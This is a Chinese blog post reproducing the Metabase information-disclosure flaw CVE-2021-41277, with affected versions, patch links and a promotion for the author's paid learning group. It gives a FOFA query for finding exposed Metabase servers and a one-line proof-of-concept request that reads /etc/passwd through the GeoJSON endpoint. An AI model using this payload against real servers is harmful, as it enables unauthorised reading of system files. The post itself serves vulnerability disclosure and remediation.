Metabase 信息泄露漏洞(CVE-2021-41277)——漏洞复现

本文揭示了Metabase平台的一个严重漏洞,攻击者可通过未授权的地图操作访问敏感信息。建议受影响版本用户升级至0.40.5及以上或1.40.5以上修复。同时提供了复现方法、修复措施和学习资源链接。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一、漏洞简介

metabase 是一个简单、开源的数据分析平台。

CVE-2021-41277

在受影响的版本中,自定义 GeoJSON 地图(admin->settings->maps->custom maps->add a map)操作缺少权限验证,攻击者可通过该漏洞获得敏感信息。

该漏洞CVSS评分:9.9,危害等级:严重

二、影响版本

影响版本:

metabase version < 0.40.5
metabase version >= 1.0.0, < 1.40.5

修复版本:

metabase version >= 0.40.5
metabase version >= 1.40.5

三、漏洞复现

1、fofa搜索 app="Metabase"
在这里插入图片描述
2、POC验证
POC:

/api/geojson?url=file:/etc/passwd

如下图所示,找到一个存在漏洞的网站
在这里插入图片描述

四、漏洞修复

1、参考漏洞影响范围,及时升级至最新安全版本:https://github.com/metabase/metabase
2、目前厂商已发布升级补丁以修复漏洞,补丁获取链接:
https://github.com/metabase/metabase/security/advisories/GHSA-w73v-6p7p-fpfr

更多资源:
1、web安全工具、渗透测试工具
2、存在漏洞的网站源码与代码审计+漏洞复现教程、
3、渗透测试学习视频、应急响应学习视频、代码审计学习视频、都是2019-2021年期间的较新视频
4、应急响应真实案例复现靶场与应急响应教程
收集整理在知识星球,可加入知识星球进行查看。也可搜索关注微信公众号:W小哥
在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

W小哥1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值